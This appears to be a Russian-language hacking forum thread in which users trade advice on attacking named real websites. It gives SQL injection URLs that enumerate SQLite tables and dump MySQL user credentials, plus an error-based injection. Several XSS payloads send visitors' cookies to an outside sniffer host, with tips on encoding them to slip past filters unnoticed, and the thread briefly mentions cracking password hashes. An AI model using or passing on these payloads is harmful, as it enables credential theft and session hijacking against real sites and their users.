доступ к серверу. Хеш типа MD5(unix) или MD5 freebsd Подбирается при помощи PasswordsPro или John the Ripper
У меня вопрос,как узнать название таблиц и,или колонок в бд sqlite,инъекция есть,вывод тоже,а вот дальше нифига не пойму что делать,подскажите плиз код: http://www.newusedcars.ru/?id=9836+union+select+1#
Предпологая что название таблиц можно посмотреть таким оброзом: http://www.newusedcars.ru/?id=98360000+union+select+tbl_name+from+SQLITE_MASTER-- а вообще как с ней работать смотри тут http://www.sqlite.org/
Я так понял такой функции как information_schema в такой бд не используется? А как составить запрос типа concat(table_name,0x3a,column_name) ?
вопрос по mysql inj в mysql есть функции concat и concat_ws. в возвращаемых запросом данных есть null, но нужно, чтобы оно отображалось как null или просто пустое место, т.е. не игнорировалось. что можно сделать?
я чё-то не понял наверное select concat(col1,':',col2,':',col3) from table limit 0,1 предположим что у тебя колонка col2 имеет значение null функция вернёт тебе blabla1::blabla3 Да и concat_ws тоже самое вернёт вроде щас тебе в асю стукну
неа, я сейчас посмотрел Piflit правильно говорит, у меня вот как получилось: попробуй сам, у меня мускул 5, если функция concat получает хоть одно значение null, то возвращает null например: SELECT concat(':','ff',null) FROM `user` вернет null
Piflit (01:42:38 21/01/2008) среди этих полей есть нулл и весь конкат возвращает нулл - а дожен результат запроса Piflit (01:42:58 21/01/2008) а про конкат_вс поля едут - а мне надо выводить это в ровную табличку
ну тогда делай по аналогии с моим примером, или дай структуру, ну вобщем поконкретней опиши, я наверное смогу помочь в этом вопросе
http://biophysics.asu.edu/banf/show_files.php?user_id=-3+union+select+concat(user,':',password,':',host),2,3+from+mysql.user+limit+2,1 здесь колонка password вернула null всё выводится зачем вам самим null подстовлять в функцию?
незнаю, пробую на phpmyadmin, null подставляю сам просто для примера, пробую на реально существующей таблице, в которой есть значение null, concat выдает null, хм вот сейчас посмотрел mysql.user поле password у пользователя root, пустое, но не null, при этом concat действительно работает как говорит Spyder, а есть еще одна табличка там конкретно прописано, что значение поля username null, при выборке из этой таблички и этого поля concat выдает null, а concat_ws игнорирует, так как говорил Piflit Скорее всего это связано с типами полей, хотя хз
2PunkAss извини не было времени посмотреть, но вобщем то вот как твои проблеммы решаются: Code: http://cleverclub.nashe.ru/rating_d.asp?sender=1'/**/or/**/cast(@@version/**/as/**/int)='1
уязвимость http://images.yandex.ru/ поиск ввожу </script><script>alert(document.cookie)</script> и появляется алерт пытаюсь сделать скрипт типа <script>img = new Image(); img.src = "http://s.netsec.ru/mda.gif?"+document.cookie;</script> тогда ничего не происходит он просто пытается это найти. как правильно использовать данную ксс? ---------------------------------------- на рамблере ксс http://www.rambler.ru/db/support/feedback.shtml?name="<script >alert()</script>выводит алерт пытался сделать скрипт типа <script img src="http://s.netsec.ru/mda.gif"> но мне на сниффер приходило только Time: 20.01 -10.35.48 IP: 80.64.91.1 Host: http://www.rambler.ru/db/support/feedback.shtml?name="<script src="http://s.netsec.ru/frigid20.gif?" document.cookie;></script> Browser: Mozilla/5.0 как правильно использовать данный ксс?
1) яндекс там фильтруются ; ? " + поэтому твой скрипт и не работает. 2) рамблер фильтруется + необходимо использовать кодирование.
У меня в опере сработало вот так Code: http://www.rambler.ru/db/support/feedback.shtml?name=</td></tr></table><script>alert(99)</script>
Нет, у меня под рукой нету снифера, так бы проверил. Закодируй + на %2b и в скрипте заюзай Code: location.href='http://путь_до_снифера.gif?'%2bdocument.cookie А еще лучше все закодируй, чтоб палева не было =)
